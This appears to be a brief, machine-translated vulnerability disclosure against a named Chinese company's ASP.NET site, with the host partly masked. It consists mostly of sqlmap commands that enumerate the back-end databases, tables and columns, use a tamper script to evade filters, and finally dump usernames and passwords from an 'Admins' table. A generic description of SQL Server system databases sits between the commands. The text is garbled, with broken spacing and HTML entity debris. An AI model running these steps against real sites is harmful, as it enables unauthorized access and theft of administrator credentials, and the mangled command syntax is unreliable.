220.163.13*.** [email protected]:~# sqlmap-u http://www.****.com.cn/****. aspx?keyword=-V 1--dbs--tamper=space2comment--level 3 web server operating system:windows 2003 or XPweb Applicat Ion Technology:ASP.NET, Microsoft IIS 6.0, ASP. 2.0.50727back-end dbms:microsoft SQL Server 2005 &nb Sp;4 system-Level library Master: The primary control function the master database controls all aspects of SQL Server. This database includes all configuration information, user logon information, and information about the process that is currently running on the server. Model: Template When you create a new database, SQL Server creates a copy of all the objects in the model database and moves them to the new database. tempdb: Temporary, access is used by all users who access your SQL Server as a container for user access. MSDB: Users are stored in the msdb database with all task scheduling, alerting, and operators. Another function of the library is to store all the backup history. The SQL Server Agent will use this library. [email protected]:~# sqlmap-u http://www.****.com.cn/****. aspx?keyword=-V 1--table-d ' nantian_web '--tamper=space2comment--level 3--threads 3 [email protected]:~# sqlmap-u http://www.****.com.cn/****. aspx?keyword=-V 1--columns-t "Admins"-d ' nantian_web '--tamper=space2comment--level 3--threads 3   &N bsp; [email protected]:~# sqlmap-u http://www.****.com.cn/****. aspx?keyword=-V 1--dump-c "Id,name,gsname,username,password,contents,tel"-T "Admins"-d ' nantian_web '--tamper= Space2comment--level 3--threads 3
Yunnan Nan Tian Electronic Information Industry Co., Ltd. A station SQL injection vulnerability